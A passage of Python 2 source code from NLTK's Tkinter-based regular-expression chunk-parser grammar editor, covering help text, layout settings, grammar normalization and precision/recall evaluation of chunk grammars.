'NNPS': 'Proper noun plural', 'WDT': 'wh-determiner',
'PDT': 'Predeterminer', 'WP': 'wh-pronoun',
'POS': 'Possessive ending', 'WP$': 'Possessive wh-pronoun',
'PRP': 'Personal pronoun', 'WRB': 'wh-adverb',
'(': 'open parenthesis', ')': 'close parenthesis',
'``': 'open quote', ',': 'comma',
"''": 'close quote', '.': 'period',
'#': 'pound sign (currency marker)',
'$': 'dollar sign (currency marker)',
'IN': 'Preposition/subord. conjunction',
'SYM': 'Symbol (mathematical or scientific)',
'VBG': 'Verb, gerund/present participle',
'VBP': 'Verb, non-3rd ps. sing. present',
':': 'colon',
}
#: Contents for the help box. This is a list of tuples, one for
#: each help page, where each tuple has four elements:
#: - A title (displayed as a tab)
#: - A string description of tabstops (see Tkinter.Text for details)
#: - The text contents for the help page. You can use expressions
#: like <red>...</red> to colorize the text; see L{HELP_AUTOTAG}
#: for a list of tags you can use for colorizing.
HELP = [
('Help', '20',
"Welcome to the regular expression chunk-parser grammar editor. "
"You can use this editor to develop and test chunk parser grammars "
"based on NLTK's RegexpChunkParser class.\n\n"
# Help box.
"Use this box ('Help') to learn more about the editor; click on the "
"tabs for help on specific topics:"
"<indent>\n"
"Rules: grammar rule types\n"
"Regexps: regular expression syntax\n"
"Tags: part of speech tags\n</indent>\n"
# Grammar.
"Use the upper-left box ('Grammar') to edit your grammar. "
"Each line of your grammar specifies a single 'rule', "
"which performs an action such as creating a chunk or merging "
"two chunks.\n\n"
# Dev set.
"The lower-left box ('Development Set') runs your grammar on the "
"development set, and displays the results. "
"Your grammar's chunks are <highlight>highlighted</highlight>, and "
"the correct (gold standard) chunks are "
"<underline>underlined</underline>. If they "
"match, they are displayed in <green>green</green>; otherwise, "
"they are displayed in <red>red</red>. The box displays a single "
"sentence from the development set at a time; use the scrollbar or "
"the next/previous buttons view additional sentences.\n\n"
# Performance
"The lower-right box ('Evaluation') tracks the performance of "
"your grammar on the development set. The 'precision' axis "
"indicates how many of your grammar's chunks are correct; and "
"the 'recall' axis indicates how many of the gold standard "
"chunks your system generated. Typically, you should try to "
"design a grammar that scores high on both metrics. The "
"exact precision and recall of the current grammar, as well "
"as their harmonic mean (the 'f-score'), are displayed in "
"the status bar at the bottom of the window."
),
('Rules', '10',
"<h1>{...regexp...}</h1>"
"<indent>\nChunk rule: creates new chunks from words matching "
"regexp.</indent>\n\n"
"<h1>}...regexp...{</h1>"
"<indent>\nChink rule: removes words matching regexp from existing "
"chunks.</indent>\n\n"
"<h1>...regexp1...}{...regexp2...</h1>"
"<indent>\nSplit rule: splits chunks that match regexp1 followed by "
"regexp2 in two.</indent>\n\n"
"<h1>...regexp...{}...regexp...</h1>"
"<indent>\nMerge rule: joins consecutive chunks that match regexp1 "
"and regexp2</indent>\n"
),
('Regexps', '10 60',
#"Regular Expression Syntax Summary:\n\n"
"<h1>Pattern\t\tMatches...</h1>\n"
"<hangindent>"
"\t<<var>T</var>>\ta word with tag <var>T</var> "
"(where <var>T</var> may be a regexp).\n"
"\t<var>x</var>?\tan optional <var>x</var>\n"
"\t<var>x</var>+\ta sequence of 1 or more <var>x</var>'s\n"
"\t<var>x</var>*\ta sequence of 0 or more <var>x</var>'s\n"
"\t<var>x</var>|<var>y</var>\t<var>x</var> or <var>y</var>\n"
"\t.\tmatches any character\n"
"\t(<var>x</var>)\tTreats <var>x</var> as a group\n"
"\t# <var>x...</var>\tTreats <var>x...</var> "
"(to the end of the line) as a comment\n"
"\t\\<var>C</var>\tmatches character <var>C</var> "
"(useful when <var>C</var> is a special character "
"like + or #)\n"
"</hangindent>"
"\n<h1>Examples:</h1>\n"
"<hangindent>"
'\t<regexp><NN></regexp>\n'
'\t\tMatches <match>"cow/NN"</match>\n'
'\t\tMatches <match>"green/NN"</match>\n'
'\t<regexp><VB.*></regexp>\n'
'\t\tMatches <match>"eating/VBG"</match>\n'
'\t\tMatches <match>"ate/VBD"</match>\n'
'\t<regexp><IN><DT><NN></regexp>\n'
'\t\tMatches <match>"on/IN the/DT car/NN"</match>\n'
'\t<regexp><RB>?<VBD></regexp>\n'
'\t\tMatches <match>"ran/VBD"</match>\n'
'\t\tMatches <match>"slowly/RB ate/VBD"</match>\n'
'\t<regexp><\#><CD> # This is a comment...</regexp>\n'
'\t\tMatches <match>"#/# 100/CD"</match>\n'
"</hangindent>"
),
('Tags', '10 60',
"<h1>Part of Speech Tags:</h1>\n" +
'<hangindent>' +
'<<TAGSET>>' + # this gets auto-substituted w/ self.TAGSET
'</hangindent>\n')
]
HELP_AUTOTAG = [
('red', dict(foreground='#a00')),
('green', dict(foreground='#080')),
('highlight', dict(background='#ddd')),
('underline', dict(underline=True)),
('h1', dict(underline=True)),
('indent', dict(lmargin1=20, lmargin2=20)),
('hangindent', dict(lmargin1=0, lmargin2=60)),
('var', dict(foreground='#88f')),
('regexp', dict(foreground='#ba7')),
('match', dict(foreground='#6a6')),
]
##/////////////////////////////////////////////////////////////////
## Config Parmeters
##/////////////////////////////////////////////////////////////////
_EVAL_DELAY = 1
"""If the user has not pressed any key for this amount of time (in
seconds), and the current grammar has not been evaluated, then
the eval demon will evaluate it."""
_EVAL_CHUNK = 15
"""The number of sentences that should be evaluated by the eval
demon each time it runs."""
_EVAL_FREQ = 0.2
"""The frequency (in seconds) at which the eval demon is run"""
_EVAL_DEMON_MIN = .02
"""The minimum amount of time that the eval demon should take each time
it runs -- if it takes less than this time, _EVAL_CHUNK will be
modified upwards."""
_EVAL_DEMON_MAX = .04
"""The maximum amount of time that the eval demon should take each time
it runs -- if it takes more than this time, _EVAL_CHUNK will be
modified downwards."""
_GRAMMARBOX_PARAMS = dict(
width=40, height=12, background='#efe', highlightbackground='#efe',
highlightthickness=1, relief='groove', border=2, wrap='word')
_HELPBOX_PARAMS = dict(
width=15, height=15, background='#efe', highlightbackground='#efe',
foreground='#555',
highlightthickness=1, relief='groove', border=2, wrap='word')
_DEVSETBOX_PARAMS = dict(
width=70, height=10, background='#eef', highlightbackground='#eef',
highlightthickness=1, relief='groove', border=2, wrap='word',
tabs=(30,))
_STATUS_PARAMS = dict(
background='#9bb', relief='groove', border=2)
_FONT_PARAMS = dict(
family='helvetica', size=-20)
_FRAME_PARAMS = dict(
background='#777', padx=2, pady=2, border=3)
_EVALBOX_PARAMS = dict(
background='#eef', highlightbackground='#eef',
highlightthickness=1, relief='groove', border=2,
width=300, height=280)
_BUTTON_PARAMS = dict(
background='#777', activebackground='#777',
highlightbackground='#777')
_HELPTAB_BG_COLOR = '#aba'
_HELPTAB_FG_COLOR = '#efe'
_HELPTAB_FG_PARAMS = dict(background='#efe')
_HELPTAB_BG_PARAMS = dict(background='#aba')
_HELPTAB_SPACER = 6
def normalize_grammar(self, grammar):
# Strip comments
grammar = re.sub(r'((\\.|[^#])*)(#.*)?', r'\1', grammar)
# Normalize whitespace
grammar = re.sub(' +', ' ', grammar)
grammar = re.sub('\n\s+', '\n', grammar)
grammar = grammar.strip()
# [xx] Hack: automatically backslash $!
grammar = re.sub(r'([^\\])\$', r'\1\\$', grammar)
return grammar
def __init__(self, devset_name='conll2000', devset=None,
grammar = '', chunk_node='NP', tagset=None):
"""
@param devset_name: The name of the development set; used for
display & for save files. If either the name 'treebank'
or the name 'conll2000' is used, and devset is None, then
devset will be set automatically.
@param devset: A list of chunked sentences
@param grammar: The initial grammar to display.
@param tagset: Dictionary from tags to string descriptions, used
for the help page. Defaults to C{self.TAGSET}.
"""
self._chunk_node = chunk_node
if tagset is None: tagset = self.TAGSET
self.tagset = tagset
# Named development sets:
if devset is None:
if devset_name == 'conll2000':
devset = nltk.corpus.conll2000.chunked_sents('train.txt')#[:100]
elif devset == 'treebank':
devset = nltk.corpus.treebank_chunk.chunked_sents()#[:100]
else:
raise ValueError('Unknown development set %s' % devset_name)
self.chunker = None
"""The chunker built from the grammar string"""
self.grammar = grammar
"""The unparsed grammar string"""
self.normalized_grammar = None
"""A normalized version of L{self.grammar}."""
self.grammar_changed = 0
"""The last time() that the grammar was changed."""
self.devset = devset
"""The development set -- a list of chunked sentences."""
self.devset_name = devset_name
"""The name of the development set (for save files)."""
self.devset_index = -1
"""The index into the development set of the first instance
that's currently being viewed."""
self._last_keypress = 0
"""The time() when a key was most recently pressed"""
self._history = []
"""A list of (grammar, precision, recall, fscore) tuples for
grammars that the user has already tried."""
self._history_index = 0
"""When the user is scrolling through previous grammars, this
is used to keep track of which grammar they're looking at."""
self._eval_grammar = None
"""The grammar that is being currently evaluated by the eval
demon."""
self._eval_normalized_grammar = None
"""A normalized copy of L{_eval_grammar}."""
self._eval_index = 0
"""The index of the next sentence in the development set that
should be looked at by the eval demon."""
self._eval_score = nltk.chunk.ChunkScore(chunk_node=chunk_node)
"""The L{ChunkScore <nltk.chunk.ChunkScore>} object that's used
to keep track of the score of the current grammar on the
development set."""
# Set up the main window.
top = self.top = Tk()
top.geometry('+50+50')
top.title('Regexp Chunk Parser App')
top.bind('<Control-q>', self.destroy)
# Varaible that restricts how much of the devset we look at.
self._devset_size = IntVar(top)
self._devset_size.set(100)
# Set up all the tkinter widgets
self._init_fonts(top)
self._init_widgets(top)
self._init_bindings(top)
self._init_menubar(top)
self.grammarbox.focus()
# If a grammar was given, then display it.
if grammar:
self.grammarbox.insert('end', grammar+'\n')
self.grammarbox.mark_set('insert', '1.0')
# Display the first item in the development set
self.show_devset(0)
self.update()
def _init_bindings(self, top):
top.bind('<Control-n>', self._devset_next)
top.bind('<Control-p>', self._devset_prev)
top.bind('<Control-t>', self.toggle_show_trace)
top.bind('<KeyPress>', self.update)
top.bind('<Control-s>', lambda e: self.save_grammar())
top.bind('<Control-o>', lambda e: self.load_grammar())
self.grammarbox.bind('<Control-t>', self.toggle_show_trace)
self.grammarbox.bind('<Control-n>', self._devset_next)
self.grammarbox.bind('<Control-p>', self._devset_prev)
# Redraw the eval graph when the window size changes
self.evalbox.bind('<Configure>', self._eval_plot)
def _init_fonts(self, top):
# TWhat's our font size (default=same as sysfont)
self._size = IntVar(top)
self._size.set(20)
self._font = tkFont.Font(family='helvetica',
size=-self._size.get())
self._smallfont = tkFont.Font(family='helvetica',
size=-(self._size.get()*14/20))
def _init_menubar(self, parent):
menubar = Menu(parent)
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label='Reset Application', underline=0,
command=self.reset)
filemenu.add_command(label='Save Current Grammar', underline=0,
accelerator='Ctrl-s',
command=self.save_grammar)
filemenu.add_command(label='Load Grammar', underline=0,
accelerator='Ctrl-o',
command=self.load_grammar)
filemenu.add_command(label='Save Grammar History', underline=13,
command=self.save_history)
filemenu.add_command(label='Exit', underline=1,
command=self.destroy, accelerator='Ctrl-q')
menubar.add_cascade(label='File', underline=0, menu=filemenu)
viewmenu = Menu(menubar, tearoff=0)
viewmenu.add_radiobutton(label='Tiny', variable=self._size,
underline=0, value=10, command=self.resize)
viewmenu.add_radiobutton(label='Small', variable=self._size,
underline=0, value=16, command=self.resize)
viewmenu.add_radiobutton(label='Medium', variable=self._size,
underline=0, value=20, command=self.resize)
viewmenu.add_radiobutton(label='Large', variable=self._size,
underline=0, value=24, command=self.resize)
viewmenu.add_radiobutton(label='Huge', variable=self._size,
underline=0, value=34, command=self.resize)
menubar.add_cascade(label='View', underline=0, menu=viewmenu)
devsetmenu = Menu(menubar, tearoff=0)
devsetmenu.add_radiobutton(label='50 sentences',
variable=self._devset_size,
value=50, command=self.set_devset_size)
devsetmenu.add_radiobutton(label='100 sentences',
variable=self._devset_size,
value=100, command=self.set_devset_size)
devsetmenu.add_radiobutton(label='200 sentences',
variable=self._devset_size,
value=200, command=self.set_devset_size)
devsetmenu.add_radiobutton(label='500 sentences',
variable=self._devset_size,
value=500, command=self.set_devset_size)
menubar.add_cascade(label='Development-Set', underline=0,
menu=devsetmenu)
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label='About', underline=0,
command=self.about)
menubar.add_cascade(label='Help', underline=0, menu=helpmenu)
parent.config(menu=menubar)
def toggle_show_trace(self, *e):
if self._showing_trace:
self.show_devset()
else:
self.show_trace()
return 'break'
_SCALE_N = 5 # center on the last 5 examples.
_DRAW_LINES = False
def _eval_plot(self, *e, **config):
width = config.get('width', self.evalbox.winfo_width())
height = config.get('height', self.evalbox.winfo_height())
# Clear the canvas
self.evalbox.delete('all')
# Draw the precision & recall labels.
tag = self.evalbox.create_text(10, height/2-10, justify='left',
anchor='w', text='Precision')
left, right = self.evalbox.bbox(tag)[2] + 5, width-10
tag = self.evalbox.create_text(left + (width-left)/2, height-10,
anchor='s', text='Recall', justify='center')
top, bot = 10, self.evalbox.bbox(tag)[1]-10
# Draw masks for clipping the plot.
bg = self._EVALBOX_PARAMS['background']
self.evalbox.lower(self.evalbox.create_rectangle(0, 0, left-1, 5000,
fill=bg, outline=bg))
self.evalbox.lower(self.evalbox.create_rectangle(0, bot+1, 5000, 5000,
fill=bg, outline=bg))
# Calculate the plot's scale.
if self._autoscale.get() and len(self._history) > 1:
max_precision = max_recall = 0
min_precision = min_recall = 1
for i in range(1, min(len(self._history), self._SCALE_N+1)):
grammar, precision, recall, fmeasure = self._history[-i]
min_precision = min(precision, min_precision)
min_recall = min(recall, min_recall)
max_precision = max(precision, max_precision)
max_recall = max(recall, max_recall)
# if max_precision-min_precision > max_recall-min_recall:
# min_recall -= (max_precision-min_precision)/2
# max_recall += (max_precision-min_precision)/2
# else:
# min_precision -= (max_recall-min_recall)/2
# max_precision += (max_recall-min_recall)/2
# if min_recall < 0:
# max_recall -= min_recall
# min_recall = 0
# if min_precision < 0:
# max_precision -= min_precision
# min_precision = 0
min_precision = max(min_precision-.01, 0)
min_recall = max(min_recall-.01, 0)
max_precision = min(max_precision+.01, 1)
max_recall = min(max_recall+.01, 1)
else:
min_precision = min_recall = 0
max_precision = max_recall = 1
# Draw the axis lines & grid lines
for i in range(11):
x = left + (right-left)*((i/10.-min_recall)/
(max_recall-min_recall))
y = bot - (bot-top)*((i/10.-min_precision)/
(max_precision-min_precision))
if left < x < right:
self.evalbox.create_line(x, top, x, bot, fill='#888')
if top < y < bot:
self.evalbox.create_line(left, y, right, y, fill='#888')
self.evalbox.create_line(left, top, left, bot)
self.evalbox.create_line(left, bot, right, bot)
# Display the plot's scale
self.evalbox.create_text(
left-3, bot, justify='right', anchor='se',
text='%d%%' % (100*min_precision))
self.evalbox.create_text(
left-3, top, justify='right', anchor='ne',
text='%d%%' % (100*max_precision))
self.evalbox.create_text(
left, bot+3, justify='center', anchor='nw',
text='%d%%' % (100*min_recall))
self.evalbox.create_text(
right, bot+3, justify='center', anchor='ne',
text='%d%%' % (100*max_recall))
# Display the scores.
prev_x = prev_y = None
for i, (_, precision, recall, fscore) in enumerate(self._history):
x = left + (right-left) * ((recall-min_recall) /
(max_recall-min_recall))
y = bot - (bot-top) * ((precision-min_precision) /
(max_precision-min_precision))
if i == self._history_index:
self.evalbox.create_oval(x-2,y-2,x+2,y+2,
fill='#0f0', outline='#000')
self.status['text'] = (
'Precision: %.2f%%\t' % (precision*100)+
'Recall: %.2f%%\t' % (recall*100)+
'F-score: %.2f%%' % (fscore*100))
else:
self.evalbox.lower(
self.evalbox.create_oval(x-2,y-2,x+2,y+2,
fill='#afa', outline='#8c8'))
if prev_x is not None and self._eval_lines.get():
self.evalbox.lower(
self.evalbox.create_line(prev_x, prev_y, x, y,
fill='#8c8'))
prev_x, prev_y = x, y
_eval_demon_running = False
def _eval_demon(self):
if self.top is None: return
if self.chunker is None:
self._eval_demon_running = False
return
# Note our starting time.
t0 = time.time()
# If are still typing, then wait for them to finish.
if (time.time()-self._last_keypress < self._EVAL_DELAY and
self.normalized_grammar != self._eval_normalized_grammar):
self._eval_demon_running = True
return self.top.after(int(self._EVAL_FREQ*1000), self._eval_demon)
# If the grammar changed, restart the evaluation.
if self.normalized_grammar != self._eval_normalized_grammar:
# Check if we've seen this grammar already. If so, then
# just use the old evaluation values.
for (g, p, r, f) in self._history:
if self.normalized_grammar == self.normalize_grammar(g):
self._history.append( (g, p, r, f) )
self._history_index = len(self._history) - 1
self._eval_plot()
self._eval_demon_running = False
self._eval_normalized_grammar = None
return
self._eval_index = 0
self._eval_score = nltk.chunk.ChunkScore(chunk_node=
self._chunk_node)
self._eval_grammar = self.grammar
self._eval_normalized_grammar = self.normalized_grammar
# If the grammar is empty, the don't bother evaluating it, or
# recording it in history -- the score will just be 0.
if self.normalized_grammar.strip() == '':
#self._eval_index = self._devset_size.get()
self._eval_demon_running = False
return
# Score the next set of examples
for gold in self.devset[self._eval_index:
min(self._eval_index+self._EVAL_CHUNK,
self._devset_size.get())]:
guess = self._chunkparse(gold.leaves())
self._eval_score.score(gold, guess)
# update our index in the devset.
self._eval_index += self._EVAL_CHUNK
# Check if we're done
if self._eval_index >= self._devset_size.get():
self._history.append( (self._eval_grammar,
self._eval_score.precision(),
self._eval_score.recall(),
self._eval_score.f_measure()) )
self._history_index = len(self._history)-1
self._eval_plot()
self._eval_demon_running = False
self._eval_normalized_grammar = None
else:
progress = 100*self._eval_index/self._devset_size.get()
self.status['text'] = ('Evaluating on Development Set (%d%%)' %
progress)
self._eval_demon_running = True
self._adaptively_modify_eval_chunk(time.time() - t0)
self.top.after(int(self._EVAL_FREQ*1000), self._eval_demon)
def _adaptively_modify_eval_chunk(self, t):
"""
Modify _EVAL_CHUNK to try to keep the amount of time that the
eval demon takes between _EVAL_DEMON_MIN and _EVAL_DEMON_MAX.
@param t: The amount of time that the eval demon took.
"""
if t > self._EVAL_DEMON_MAX and self._EVAL_CHUNK > 5:
self._EVAL_CHUNK = min(self._EVAL_CHUNK-1,
max(int(self._EVAL_CHUNK*(self._EVAL_DEMON_MAX/t)),
self._EVAL_CHUNK-10))
elif t < self._EVAL_DEMON_MIN:
self._EVAL_CHUNK = max(self._EVAL_CHUNK+1,
min(int(self._EVAL_CHUNK*(self._EVAL_DEMON_MIN/t)),
self._EVAL_CHUNK+10))
def _init_widgets(self, top):
frame0 = Frame(top, **self._FRAME_PARAMS)
frame0.grid_columnconfigure(0, weight=4)
frame0.grid_columnconfigure(3, weight=2)
frame0.grid_rowconfigure(1, weight=1)
frame0.grid_rowconfigure(5, weight=1)
# The grammar
self.grammarbox = Text(frame0, font=self._font,
**self._GRAMMARBOX_PARAMS)
self.grammarlabel = Label(frame0, font=self._font, text='Grammar:',
highlightcolor='black',
background=self._GRAMMARBOX_PARAMS['background'])
self.grammarlabel.grid(column=0, row=0, sticky='SW')
self.grammarbox.grid(column=0, row=1, sticky='NEWS')
# Scroll bar for grammar
grammar_scrollbar = Scrollbar(frame0, command=self.grammarbox.yview)
grammar_scrollbar.grid(column=1, row=1, sticky='NWS')
self.grammarbox.config(yscrollcommand=grammar_scrollbar.set)
# grammar buttons
bg = self._FRAME_PARAMS['background']
frame3 = Frame(frame0, background=bg)
frame3.grid(column=0, row=2, sticky='EW')
Button(frame3, text='Prev Grammar', command=self._history_prev,
**self._BUTTON_PARAMS).pack(side='left')
Button(frame3, text='Next Grammar', command=self._history_next,
**self._BUTTON_PARAMS).pack(side='left')
# Help box
self.helpbox = Text(frame0, font=self._smallfont,
**self._HELPBOX_PARAMS)
self.helpbox.grid(column=3, row=1, sticky='NEWS')
self.helptabs = {}
bg = self._FRAME_PARAMS['background']
helptab_frame = Frame(frame0, background=bg)
helptab_frame.grid(column=3, row=0, sticky='SW')
for i, (tab, tabstops, text) in enumerate(self.HELP):
label = Label(helptab_frame, text=tab, font=self._smallfont)
label.grid(column=i*2, row=0, sticky='S')
#help_frame.grid_columnconfigure(i, weight=1)
#label.pack(side='left')
label.bind('<ButtonPress>', lambda e, tab=tab: self.show_help(tab))
self.helptabs[tab] = label
Frame(helptab_frame, height=1, width=self._HELPTAB_SPACER,
background=bg).grid(column=i*2+1, row=0)
self.helptabs[self.HELP[0][0]].configure(font=self._font)
self.helpbox.tag_config('elide', elide=True)
for (tag, params) in self.HELP_AUTOTAG:
self.helpbox.tag_config('tag-%s' % tag, **params)
self.show_help(self.HELP[0][0])
# Scroll bar for helpbox
help_scrollbar = Scrollbar(frame0, command=self.helpbox.yview)
self.helpbox.config(yscrollcommand=help_scrollbar.set)
help_scrollbar.grid(column=4, row=1, sticky='NWS')
# The dev set
frame4 = Frame(frame0, background=self._FRAME_PARAMS['background'])
self.devsetbox = Text(frame4, font=self._font,
**self._DEVSETBOX_PARAMS)
self.devsetbox.pack(expand=True, fill='both')
self.devsetlabel = Label(frame0, font=self._font,
text='Development Set:', justify='right',
background=self._DEVSETBOX_PARAMS['background'])
self.devsetlabel.grid(column=0, row=4, sticky='SW')
frame4.grid(column=0, row=5, sticky='NEWS')
# dev set scrollbars
self.devset_scroll = Scrollbar(frame0, command=self._devset_scroll)
self.devset_scroll.grid(column=1, row=5, sticky='NWS')
self.devset_xscroll = Scrollbar(frame4, command=self.devsetbox.xview,
orient='horiz')
self.devsetbox['xscrollcommand'] = self.devset_xscroll.set
self.devset_xscroll.pack(side='bottom', fill='x')
# dev set buttons
bg = self._FRAME_PARAMS['background']
frame1 = Frame(frame0, background=bg)
frame1.grid(column=0, row=7, sticky='EW')
Button(frame1, text='Prev Example (Ctrl-p)',
command=self._devset_prev,
**self._BUTTON_PARAMS).pack(side='left')
Button(frame1, text='Next Example (Ctrl-n)',
command=self._devset_next,
**self._BUTTON_PARAMS).pack(side='left')
self.devset_button = Button(frame1, text='Show example',
command=self.show_devset,
state='disabled',
**self._BUTTON_PARAMS)
self.devset_button.pack(side='right')
self.trace_button = Button(frame1, text='Show trace',
command=self.show_trace,
**self._BUTTON_PARAMS)
self.trace_button.pack(side='right')
# evaluation box
self.evalbox = Canvas(frame0, **self._EVALBOX_PARAMS)
label = Label(frame0, font=self._font, text='Evaluation:',
justify='right', background=self._EVALBOX_PARAMS['background'])
label.grid(column=3, row=4, sticky='SW')
self.evalbox.grid(column=3, row=5, sticky='NEWS', columnspan=2)
# evaluation box buttons
bg = self._FRAME_PARAMS['background']
frame2 = Frame(frame0, background=bg)
frame2.grid(column=3, row=7, sticky='EW')
self._autoscale = IntVar(self.top)
self._autoscale.set(False)
Checkbutton(frame2, variable=self._autoscale, command=self._eval_plot,
text='Zoom', **self._BUTTON_PARAMS).pack(side='left')
self._eval_lines = IntVar(self.top)
self._eval_lines.set(False)
Checkbutton(frame2, variable=self._eval_lines, command=self._eval_plot,
text='Lines', **self._BUTTON_PARAMS).pack(side='left')
Button(frame2, text='History',
**self._BUTTON_PARAMS).pack(side='right')
# The status label
self.status = Label(frame0, font=self._font, **self._STATUS_PARAMS)
self.status.grid(column=0, row=9, sticky='NEW', padx=3, pady=2,
columnspan=5)
# Help box & devset box can't be edited.
self.helpbox['state'] = 'disabled'
self.devsetbox['state'] = 'disabled'
# Spacers
bg = self._FRAME_PARAMS['background']
Frame(frame0, height=10, width=0, background=bg).grid(column=0, row=3)
Frame(frame0, height=0, width=10, background=bg).grid(column=2, row=0)
Frame(frame0, height=6, width=0, background=bg).grid(column=0, row=8)
# pack the frame.
frame0.pack(fill='both', expand=True)
# Set up colors for the devset box
self.devsetbox.tag_config('true-pos', background='#afa',
underline='True')
self.devsetbox.tag_config('false-neg', underline='True',
foreground='#800')
self.devsetbox.tag_config('false-pos', background='#faa')
self.devsetbox.tag_config('trace', foreground='#666', wrap='none')
self.devsetbox.tag_config('wrapindent', lmargin2=30, wrap='none')
self.devsetbox.tag_config('error', foreground='#800')
# And for the grammarbox
self.grammarbox.tag_config('error', background='#fec')
self.grammarbox.tag_config('comment', foreground='#840')
self.grammarbox.tag_config('angle', foreground='#00f')
self.grammarbox.tag_config('brace', foreground='#0a0')
self.grammarbox.tag_config('hangindent', lmargin1=0, lmargin2=40)
_showing_trace = False
def show_trace(self, *e):
self._showing_trace = True
self.trace_button['state'] = 'disabled'
self.devset_button['state'] = 'normal'
self.devsetbox['state'] = 'normal'
#self.devsetbox['wrap'] = 'none'
self.devsetbox.delete('1.0', 'end')
self.devsetlabel['text']='Development Set (%d/%d)' % (
(self.devset_index+1, self._devset_size.get()))
if self.chunker is None:
self.devsetbox.insert('1.0', 'Trace: waiting for a valid grammar.')
self.devsetbox.tag_add('error', '1.0', 'end')
return # can't do anything more
gold_tree = self.devset[self.devset_index]
rules = self.chunker.rules()
# Calculate the tag sequence
tagseq = '\t'
charnum = [1]
for wordnum, (word, pos) in enumerate(gold_tree.leaves()):
tagseq += '%s ' % pos
charnum.append(len(tagseq))
self.charnum = dict(((i, j), charnum[j])
for i in range(len(rules)+1)
for j in range(len(charnum)))
self.linenum = dict((i,i*2+2) for i in range(len(rules)+1))
for i in range(len(rules)+1):
if i == 0:
self.devsetbox.insert('end', 'Start:\n')
self.devsetbox.tag_add('trace', 'end -2c linestart', 'end -2c')
else:
self.devsetbox.insert('end', 'Apply %s:\n' % rules[i-1])
self.devsetbox.tag_add('trace', 'end -2c linestart', 'end -2c')
# Display the tag sequence.
self.devsetbox.insert('end', tagseq+'\n')
self.devsetbox.tag_add('wrapindent','end -2c linestart','end -2c')
# Run a partial parser, and extract gold & test chunks
chunker = nltk.chunk.RegexpChunkParser(rules[:i])
test_tree = self._chunkparse(gold_tree.leaves())
gold_chunks = self._chunks(gold_tree)
test_chunks = self._chunks(test_tree)
# Compare them.
for chunk in gold_chunks.intersection(test_chunks):
self._color_chunk(i, chunk, 'true-pos')
for chunk in gold_chunks - test_chunks:
self._color_chunk(i, chunk, 'false-neg')
for chunk in test_chunks - gold_chunks:
self._color_chunk(i, chunk, 'false-pos')
self.devsetbox.insert('end', 'Finished.\n')
self.devsetbox.tag_add('trace', 'end -2c linestart', 'end -2c')
# This is a hack, because the x-scrollbar isn't updating its
# position right -- I'm not sure what the underlying cause is
# though. (This is on OS X w/ python 2.5)
self.top.after(100, self.devset_xscroll.set, 0, .3)
def show_help(self, tab):
self.helpbox['state'] = 'normal'
self.helpbox.delete('1.0', 'end')
for (name, tabstops, text) in self.HELP:
if name == tab:
text = text.replace('<<TAGSET>>', '\n'.join(
('\t%s\t%s' % item for item in sorted(self.tagset.items(),
key=lambda (t,w):re.match('\w+',t) and (0,t) or (1,t)))))
self.helptabs[name].config(**self._HELPTAB_FG_PARAMS)
self.helpbox.config(tabs=tabstops)
self.helpbox.insert('1.0', text+'\n'*20)
C = '1.0 + %d chars'
for (tag, params) in self.HELP_AUTOTAG:
pattern = '(?s)(<%s>)(.*?)(</%s>)' % (tag, tag)
for m in re.finditer(pattern, text):
self.helpbox.tag_add('elide',
C % m.start(1), C % m.end(1))
self.helpbox.tag_add('tag-%s' % tag,
C % m.start(2), C % m.end(2))
self.helpbox.tag_add('elide',
C % m.start(3), C % m.end(3))
else:
self.helptabs[name].config(**self._HELPTAB_BG_PARAMS)
self.helpbox['state'] = 'disabled'
def _history_prev(self, *e):
self._view_history(self._history_index-1)
return 'break'
def _history_next(self, *e):
self._view_history(self._history_index+1)
return 'break'
def _view_history(self, index):
# Bounds & sanity checking:
index = max(0, min(len(self._history)-1, index))
if not self._history: return
# Already viewing the requested history item?
if index == self._history_index:
return
# Show the requested grammar. It will get added to _history
# only if they edit it (causing self.update() to get run.)
self.grammarbox['state'] = 'normal'
self.grammarbox.delete('1.0', 'end')
self.grammarbox.insert('end', self._history[index][0])
self.grammarbox.mark_set('insert', '1.0')
self._history_index = index
self._syntax_highlight_grammar(self._history[index][0])
# Record the normalized grammar & regenerate the chunker.
self.normalized_grammar = self.normalize_grammar(
self._history[index][0])
if self.normalized_grammar:
rules = [nltk.chunk.regexp.RegexpChunkRule.parse(line)
for line in self.normalized_grammar.split('\n')]
else:
rules = []
self.chunker = nltk.chunk.RegexpChunkParser(rules)
# Show the score.
self._eval_plot()
# Update the devset box
self._highlight_devset()
if self._showing_trace: self.show_trace()
# Update the grammar label
if self._history_index < len(self._history)-1:
self.grammarlabel['text'] = 'Grammar %s/%s:' % (
self._history_index+1, len(self._history))
else:
self.grammarlabel['text'] = 'Grammar:'
def _devset_next(self, *e):
self._devset_scroll('scroll', 1, 'page')
return 'break'
def _devset_prev(self, *e):
self._devset_scroll('scroll', -1, 'page')
return 'break'
def destroy(self, *e):
if self.top is None: return
self.top.destroy()
self.top = None
def _devset_scroll(self, command, *args):
N = 1 # size of a page -- one sentence.
showing_trace = self._showing_trace
if command == 'scroll' and args[1].startswith('unit'):
self.show_devset(self.devset_index+int(args[0]))
elif command == 'scroll' and args[1].startswith('page'):
self.show_devset(self.devset_index+N*int(args[0]))
elif command == 'moveto':
self.show_devset(int(float(args[0])*self._devset_size.get()))
else:
assert 0, 'bad scroll command %s %s' % (command, args)
if showing_trace:
self.show_trace()
def show_devset(self, index=None):
if index is None: index = self.devset_index
# Bounds checking
index = min(max(0, index), self._devset_size.get()-1)
if index == self.devset_index and not self._showing_trace: return
self.devset_index = index
self._showing_trace = False
self.trace_button['state'] = 'normal'
self.devset_button['state'] = 'disabled'
# Clear the text box.
self.devsetbox['state'] = 'normal'
self.devsetbox['wrap'] = 'word'
self.devsetbox.delete('1.0', 'end')
self.devsetlabel['text']='Development Set (%d/%d)' % (
(self.devset_index+1, self._devset_size.get()))
# Add the sentences
sample = self.devset[self.devset_index:self.devset_index+1]
self.charnum = {}
self.linenum = {0:1}
for sentnum, sent in enumerate(sample):
linestr = ''
for wordnum, (word, pos) in enumerate(sent.leaves()):
self.charnum[sentnum, wordnum] = len(linestr)
linestr += '%s/%s ' % (word, pos)
self.charnum[sentnum, wordnum+1] = len(linestr)
self.devsetbox.insert('end', linestr[:-1]+'\n\n')
# Highlight chunks in the dev set
if self.chunker is not None:
self._highlight_devset()
self.devsetbox['state'] = 'disabled'
# Update the scrollbar
first = float(self.devset_index)/self._devset_size.get()
last = float(self.devset_index+2)/self._devset_size.get()
self.devset_scroll.set(first, last)
def _chunks(self, tree):
chunks = set()
